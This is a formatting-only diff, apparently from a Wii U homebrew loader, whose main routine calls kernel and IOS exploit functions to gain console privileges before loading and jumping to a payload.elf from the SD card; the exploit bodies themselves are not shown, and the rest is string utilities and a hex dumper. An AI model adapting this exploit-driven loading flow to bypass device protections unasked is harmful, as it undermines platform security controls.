return true;
|
||||
}
|
||||
@ -69,29 +70,29 @@ int main(int argc, char **argv) {
|
||||
uint32_t btn = vpad_data.hold | vpad_data.trigger;
|
||||
bool loadWithoutHacks = false;
|
||||
bool kernelDone = false;
|
||||
if((btn & VPAD_BUTTON_ZR) == VPAD_BUTTON_ZR) {
|
||||
if ((btn & VPAD_BUTTON_ZR) == VPAD_BUTTON_ZR) {
|
||||
loadWithoutHacks = true;
|
||||
}
|
||||
if((btn & VPAD_BUTTON_ZL) == VPAD_BUTTON_ZL) {
|
||||
if ((btn & VPAD_BUTTON_ZL) == VPAD_BUTTON_ZL) {
|
||||
// In case that fopen check is not working...
|
||||
WHBLogPrintf("Force kernel exploit");
|
||||
kernelDone = true;
|
||||
DoKernelExploit();
|
||||
}
|
||||
|
||||
if(!kernelDone) {
|
||||
if(fopen("fs:/vol/external01/wiiu/payload.elf", "r") != NULL) {
|
||||
if (!kernelDone) {
|
||||
if (fopen("fs:/vol/external01/wiiu/payload.elf", "r") != NULL) {
|
||||
WHBLogPrintf("We need the kernel exploit to load the payload");
|
||||
DoKernelExploit();
|
||||
}
|
||||
}
|
||||
|
||||
if(!loadWithoutHacks) {
|
||||
if (!loadWithoutHacks) {
|
||||
uint32_t entryPoint = load_loader_elf_from_sd(0, "wiiu/payload.elf");
|
||||
if(entryPoint != 0) {
|
||||
if (entryPoint != 0) {
|
||||
WHBLogPrintf("New entrypoint: %08X", entryPoint);
|
||||
int res = ((int (*)(int, char **))entryPoint)(argc, argv);
|
||||
if(res > 0) {
|
||||
int res = ((int (*)(int, char **)) entryPoint)(argc, argv);
|
||||
if (res > 0) {
|
||||
WHBLogPrintf("Returning...");
|
||||
WHBLogUdpDeinit();
|
||||
return 0;
|
||||
@ -103,20 +104,20 @@ int main(int argc, char **argv) {
|
||||
ProcUIInit(OSSavesDone_ReadyToRelease);
|
||||
DEBUG_FUNCTION_LINE("ProcUIInit done");
|
||||
|
||||
if(loadWithoutHacks) {
|
||||
if (loadWithoutHacks) {
|
||||
DEBUG_FUNCTION_LINE("Load system menu");
|
||||
// Restore the default title id to the normal wii u menu.
|
||||
unsigned long long sysmenuIdUll = _SYSGetSystemApplicationTitleId(0);
|
||||
memcpy((void*)0xF417FFF0, &sysmenuIdUll, 8);
|
||||
DCStoreRange((void*)0xF417FFF0,0x8);
|
||||
memcpy((void *) 0xF417FFF0, &sysmenuIdUll, 8);
|
||||
DCStoreRange((void *) 0xF417FFF0, 0x8);
|
||||
|
||||
DEBUG_FUNCTION_LINE("THIS IS A TEST %016llX\n",sysmenuIdUll);
|
||||
DEBUG_FUNCTION_LINE("THIS IS A TEST %016llX\n", sysmenuIdUll);
|
||||
|
||||
ExecuteIOSExploit();
|
||||
SYSLaunchMenu();
|
||||
}
|
||||
|
||||
while(CheckRunning()) {
|
||||
while (CheckRunning()) {
|
||||
// wait.
|
||||
OSSleepTicks(OSMillisecondsToTicks(100));
|
||||
}
|
||||
|
@ -36,13 +36,13 @@
|
||||
#include <utils/StringTools.h>
|
||||
|
||||
|
||||
BOOL StringTools::EndsWith(const std::string& a, const std::string& b) {
|
||||
BOOL StringTools::EndsWith(const std::string &a, const std::string &b) {
|
||||
if (b.size() > a.size())
|
||||
return false;
|
||||
return std::equal(a.begin() + a.size() - b.size(), a.end(), b.begin());
|
||||
}
|
||||
|
||||
const char * StringTools::byte_to_binary(int32_t x) {
|
||||
const char *StringTools::byte_to_binary(int32_t x) {
|
||||
static char b[9];
|
||||
b[0] = '\0';
|
||||
|
||||
@ -54,25 +54,25 @@ const char * StringTools::byte_to_binary(int32_t x) {
|
||||
return b;
|
||||
}
|
||||
|
||||
std::string StringTools::removeCharFromString(std::string& input,char toBeRemoved) {
|
||||
std::string StringTools::removeCharFromString(std::string &input, char toBeRemoved) {
|
||||
std::string output = input;
|
||||
size_t position;
|
||||
while(1) {
|
||||
while (1) {
|
||||
position = output.find(toBeRemoved);
|
||||
if(position == std::string::npos)
|
||||
if (position == std::string::npos)
|
||||
break;
|
||||
output.erase(position, 1);
|
||||
}
|
||||
return output;
|
||||
}
|
||||
|
||||
const char * StringTools::fmt(const char * format, ...) {
|
||||
const char *StringTools::fmt(const char *format, ...) {
|
||||
static char strChar[512];
|
||||
strChar[0] = 0;
|
||||
|
||||
va_list va;
|
||||
va_start(va, format);
|
||||
if((vsprintf(strChar, format, va) >= 0)) {
|
||||
if ((vsprintf(strChar, format, va) >= 0)) {
|
||||
va_end(va);
|
||||
return (const char *) strChar;
|
||||
}
|
||||
@ -81,26 +81,26 @@ const char * StringTools::fmt(const char * format, ...) {
|
||||
return NULL;
|
||||
}
|
||||
|
||||
const wchar_t * StringTools::wfmt(const char * format, ...) {
|
||||
const wchar_t *StringTools::wfmt(const char *format, ...) {
|
||||
static char tmp[512];
|
||||
static wchar_t strWChar[512];
|
||||
strWChar[0] = 0;
|
||||
tmp[0] = 0;
|
||||
|
||||
if(!format)
|
||||
if (!format)
|
||||
return (const wchar_t *) strWChar;
|
||||
|
||||
if(strcmp(format, "") == 0)
|
||||
if (strcmp(format, "") == 0)
|
||||
return (const wchar_t *) strWChar;
|
||||
|
||||
va_list va;
|
||||
va_start(va, format);
|
||||
if((vsprintf(tmp, format, va) >= 0)) {
|
||||
int bt;
|
||||
if ((vsprintf(tmp, format, va) >= 0)) {
|
||||
int bt;
|
||||
int32_t strlength = strlen(tmp);
|
||||
bt = mbstowcs(strWChar, tmp, (strlength < 512) ? strlength : 512 );
|
||||
bt = mbstowcs(strWChar, tmp, (strlength < 512) ? strlength : 512);
|
||||
|
||||
if(bt > 0) {
|
||||
if (bt > 0) {
|
||||
strWChar[bt] = 0;
|
||||
return (const wchar_t *) strWChar;
|
||||
}
|
||||
@ -110,14 +110,14 @@ const wchar_t * StringTools::wfmt(const char * format, ...) {
|
||||
return NULL;
|
||||
}
|
||||
|
||||
int32_t StringTools::strprintf(std::string &str, const char * format, ...) {
|
||||
int32_t StringTools::strprintf(std::string &str, const char *format, ...) {
|
||||
static char tmp[512];
|
||||
tmp[0] = 0;
|
||||
int32_t result = 0;
|
||||
|
||||
va_list va;
|
||||
va_start(va, format);
|
||||
if((vsprintf(tmp, format, va) >= 0)) {
|
||||
if ((vsprintf(tmp, format, va) >= 0)) {
|
||||
str = tmp;
|
||||
result = str.size();
|
||||
}
|
||||
@ -126,14 +126,14 @@ int32_t StringTools::strprintf(std::string &str, const char * format, ...) {
|
||||
return result;
|
||||
}
|
||||
|
||||
std::string StringTools::strfmt(const char * format, ...) {
|
||||
std::string StringTools::strfmt(const char *format, ...) {
|
||||
std::string str;
|
||||
static char tmp[512];
|
||||
tmp[0] = 0;
|
||||
|
||||
va_list va;
|
||||
va_start(va, format);
|
||||
if((vsprintf(tmp, format, va) >= 0)) {
|
||||
if ((vsprintf(tmp, format, va) >= 0)) {
|
||||
str = tmp;
|
||||
}
|
||||
va_end(va);
|
||||
@ -141,11 +141,11 @@ std::string StringTools::strfmt(const char * format, ...) {
|
||||
return str;
|
||||
}
|
||||
|
||||
BOOL StringTools::char2wchar_t(const char * strChar, wchar_t * dest) {
|
||||
if(!strChar || !dest)
|
||||
BOOL StringTools::char2wchar_t(const char *strChar, wchar_t *dest) {
|
||||
if (!strChar || !dest)
|
||||
return false;
|
||||
|
||||
int bt;
|
||||
int bt;
|
||||
bt = mbstowcs(dest, strChar, strlen(strChar));
|
||||
if (bt > 0) {
|
||||
dest[bt] = 0;
|
||||
@ -155,39 +155,39 @@ BOOL StringTools::char2wchar_t(const char * strChar, wchar_t * dest) {
|
||||
return false;
|
||||
}
|
||||
|
||||
int32_t StringTools::strtokcmp(const char * string, const char * compare, const char * separator) {
|
||||
if(!string || !compare)
|
||||
int32_t StringTools::strtokcmp(const char *string, const char *compare, const char *separator) {
|
||||
if (!string || !compare)
|
||||
return -1;
|
||||
|
||||
char TokCopy[512];
|
||||
strncpy(TokCopy, compare, sizeof(TokCopy));
|
||||
TokCopy[511] = '\0';
|
||||
|
||||
char * strTok = strtok(TokCopy, separator);
|
||||
char *strTok = strtok(TokCopy, separator);
|
||||
|
||||
while (strTok != NULL) {
|
||||
if (strcasecmp(string, strTok) == 0) {
|
||||
return 0;
|
||||
}
|
||||
strTok = strtok(NULL,separator);
|
||||
strTok = strtok(NULL, separator);
|
||||
}
|
||||
|
||||
return -1;
|
||||
}
|
||||
|
||||
int32_t StringTools::strextcmp(const char * string, const char * extension, char seperator) {
|
||||
if(!string || !extension)
|
||||
int32_t StringTools::strextcmp(const char *string, const char *extension, char seperator) {
|
||||
if (!string || !extension)
|
||||
return -1;
|
||||
|
||||
char *ptr = strrchr(string, seperator);
|
||||
if(!ptr)
|
||||
if (!ptr)
|
||||
return -1;
|
||||
|
||||
return strcasecmp(ptr + 1, extension);
|
||||
}
|
||||
|
||||
|
||||
std::vector<std::string> StringTools::stringSplit(const std::string & inValue, const std::string & splitter) {
|
||||
std::vector<std::string> StringTools::stringSplit(const std::string &inValue, const std::string &splitter) {
|
||||
std::string value = inValue;
|
||||
std::vector<std::string> result;
|
||||
while (true) {
|
||||
@ -202,7 +202,7 @@ std::vector<std::string> StringTools::stringSplit(const std::string & inValue, c
|
||||
result.push_back("");
|
||||
break;
|
||||
}
|
||||
if(index + splitter.size() > value.length()) {
|
||||
if (index + splitter.size() > value.length()) {
|
||||
break;
|
||||
}
|
||||
value = value.substr(index + splitter.size(), value.length());
|
||||
@ -211,39 +211,39 @@ std::vector<std::string> StringTools::stringSplit(const std::string & inValue, c
|
||||
}
|
||||
|
||||
|
||||
const char * StringTools::FullpathToFilename(const char *path) {
|
||||
if(!path)
|
||||
return path;
|
||||
const char *StringTools::FullpathToFilename(const char *path) {
|
||||
if (!path)
|
||||
return path;
|
||||
|
||||
const char * ptr = path;
|
||||
const char * Filename = ptr;
|
||||
const char *ptr = path;
|
||||
const char *Filename = ptr;
|
||||
|
||||
while(*ptr != '\0') {
|
||||
if(ptr[0] == '/' && ptr[1] != '\0')
|
||||
Filename = ptr+1;
|
||||
while (*ptr != '\0') {
|
||||
if (ptr[0] == '/' && ptr[1] != '\0')
|
||||
Filename = ptr + 1;
|
||||
|
||||
++ptr;
|
||||
}
|
||||
|
||||
return Filename;
|
||||
++ptr;
|
||||
}
|
||||
|
||||
return Filename;
|
||||
}
|
||||
|
||||
void StringTools::RemoveDoubleSlashs(std::string &str) {
|
||||
uint32_t length = str.size();
|
||||
uint32_t length = str.size();
|
||||
|
||||
//! clear path of double slashes
|
||||
for(uint32_t i = 1; i < length; ++i) {
|
||||
if(str[i-1] == '/' && str[i] == '/') {
|
||||
str.erase(i, 1);
|
||||
i--;
|
||||
length--;
|
||||
}
|
||||
//! clear path of double slashes
|
||||
for (uint32_t i = 1; i < length; ++i) {
|
||||
if (str[i - 1] == '/' && str[i] == '/') {
|
||||
str.erase(i, 1);
|
||||
i--;
|
||||
length--;
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
// You must free the result if result is non-NULL.
|
||||
char * StringTools::str_replace(char *orig, char *rep, char *with) {
|
||||
char *StringTools::str_replace(char *orig, char *rep, char *with) {
|
||||
char *result; // the return string
|
||||
char *ins; // the next insert point
|
||||
char *tmp; // varies
|
||||
@ -268,7 +268,7 @@ char * StringTools::str_replace(char *orig, char *rep, char *with) {
|
||||
ins = tmp + len_rep;
|
||||
}
|
||||
|
||||
tmp = result = (char*)malloc(strlen(orig) + (len_with - len_rep) * count + 1);
|
||||
tmp = result = (char *) malloc(strlen(orig) + (len_with - len_rep) * count + 1);
|
||||
|
||||
if (!result)
|
||||
return NULL;
|
||||
|
@ -32,20 +32,33 @@
|
||||
|
||||
class StringTools {
|
||||
public:
|
||||
static BOOL EndsWith(const std::string& a, const std::string& b);
|
||||
static const char * byte_to_binary(int32_t x);
|
||||
static std::string removeCharFromString(std::string& input,char toBeRemoved);
|
||||
static const char * fmt(const char * format, ...);
|
||||
static const wchar_t * wfmt(const char * format, ...);
|
||||
static int32_t strprintf(std::string &str, const char * format, ...);
|
||||
static std::string strfmt(const char * format, ...);
|
||||
static BOOL char2wchar_t(const char * src, wchar_t * dest);
|
||||
static int32_t strtokcmp(const char * string, const char * compare, const char * separator);
|
||||
static int32_t strextcmp(const char * string, const char * extension, char seperator);
|
||||
static BOOL EndsWith(const std::string &a, const std::string &b);
|
||||
|
||||
static const char *byte_to_binary(int32_t x);
|
||||
|
||||
static std::string removeCharFromString(std::string &input, char toBeRemoved);
|
||||
|
||||
static const char *fmt(const char *format, ...);
|
||||
|
||||
static const wchar_t *wfmt(const char *format, ...);
|
||||
|
||||
static int32_t strprintf(std::string &str, const char *format, ...);
|
||||
|
||||
static std::string strfmt(const char *format, ...);
|
||||
|
||||
static BOOL char2wchar_t(const char *src, wchar_t *dest);
|
||||
|
||||
static int32_t strtokcmp(const char *string, const char *compare, const char *separator);
|
||||
|
||||
static int32_t strextcmp(const char *string, const char *extension, char seperator);
|
||||
|
||||
static char *str_replace(char *orig, char *rep, char *with);
|
||||
static const char * FullpathToFilename(const char *path);
|
||||
|
||||
static const char *FullpathToFilename(const char *path);
|
||||
|
||||
static void RemoveDoubleSlashs(std::string &str);
|
||||
static std::vector<std::string> stringSplit(const std::string & value, const std::string & splitter);
|
||||
|
||||
static std::vector<std::string> stringSplit(const std::string &value, const std::string &splitter);
|
||||
};
|
||||
|
||||
#endif /* __STRING_TOOLS_H */
|
||||
|
@ -1,4 +1,5 @@
|
||||
#pragma once
|
||||
|
||||
#include <whb/log.h>
|
||||
#include <string.h>
|
||||
|
||||
|
@ -7,31 +7,31 @@
|
||||
#include "utils/logger.h"
|
||||
|
||||
// https://gist.github.com/ccbrown/9722406
|
||||
void dumpHex(const void* data, size_t size) {
|
||||
void dumpHex(const void *data, size_t size) {
|
||||
char ascii[17];
|
||||
size_t i, j;
|
||||
ascii[16] = '\0';
|
||||
WHBLogPrintf("0x%08X (0x0000): ", data);
|
||||
for (i = 0; i < size; ++i) {
|
||||
WHBLogWritef("%02X ", ((unsigned char*)data)[i]);
|
||||
if (((unsigned char*)data)[i] >= ' ' && ((unsigned char*)data)[i] <= '~') {
|
||||
ascii[i % 16] = ((unsigned char*)data)[i];
|
||||
WHBLogWritef("%02X ", ((unsigned char *) data)[i]);
|
||||
if (((unsigned char *) data)[i] >= ' ' && ((unsigned char *) data)[i] <= '~') {
|
||||
ascii[i % 16] = ((unsigned char *) data)[i];
|
||||
} else {
|
||||
ascii[i % 16] = '.';
|
||||
}
|
||||
if ((i+1) % 8 == 0 || i+1 == size) {
|
||||
if ((i + 1) % 8 == 0 || i + 1 == size) {
|
||||
WHBLogWritef(" ");
|
||||
if ((i+1) % 16 == 0) {
|
||||
if ((i + 1) % 16 == 0) {
|
||||
WHBLogWritef("| %s \n", ascii);
|
||||
if(i + 1 < size) {
|
||||
DEBUG_FUNCTION_LINE("0x%08X (0x%04X); ", data + i + 1,i+1);
|
||||
if (i + 1 < size) {
|
||||
DEBUG_FUNCTION_LINE("0x%08X (0x%04X); ", data + i + 1, i + 1);
|
||||
}
|
||||
} else if (i+1 == size) {
|
||||
ascii[(i+1) % 16] = '\0';
|
||||
if ((i+1) % 16 <= 8) {
|
||||
} else if (i + 1 == size) {
|
||||
ascii[(i + 1) % 16] = '\0';
|
||||
if ((i + 1) % 16 <= 8) {
|
||||
WHBLogWritef(" ");
|
||||
}
|
||||
for (j = (i+1) % 16; j < 16; ++j) {
|
||||
for (j = (i + 1) % 16; j < 16; ++j) {
|
||||
WHBLogWritef(" ");
|
||||
}
|
||||
WHBLogWritef("| %s \n", ascii);
|
||||
|
@ -7,12 +7,12 @@
|
||||
extern "C" {
|
||||
#endif
|
||||
|
||||
#define LIMIT(x, min, max) \
|
||||
({ \
|
||||
typeof( x ) _x = x; \
|
||||
typeof( min ) _min = min; \
|
||||
typeof( max ) _max = max; \
|
||||
( ( ( _x ) < ( _min ) ) ? ( _min ) : ( ( _x ) > ( _max ) ) ? ( _max) : ( _x ) ); \
|
||||
#define LIMIT(x, min, max) \
|
||||
({ \
|
||||
typeof( x ) _x = x; \
|
||||
typeof( min ) _min = min; \
|
||||
typeof( max ) _max = max; \
|
||||
( ( ( _x ) < ( _min ) ) ? ( _min ) : ( ( _x ) > ( _max ) ) ? ( _max) : ( _x ) ); \
|
||||
})
|
||||
|
||||
#define DegToRad(a) ( (a) * 0.01745329252f )
|
||||
@ -31,7 +31,7 @@ extern "C" {
|
||||
#define le64(i) ((((uint64_t)le32((i) & 0xFFFFFFFFLL)) << 32) | ((uint64_t)le32(((i) & 0xFFFFFFFF00000000LL) >> 32)))
|
||||
|
||||
//Needs to have log_init() called beforehand.
|
||||
void dumpHex(const void* data, size_t size);
|
||||
void dumpHex(const void *data, size_t size);
|
||||
|
||||
#ifdef __cplusplus
|
||||
}
|
||||
|
Loading…
Reference in New Issue
Block a user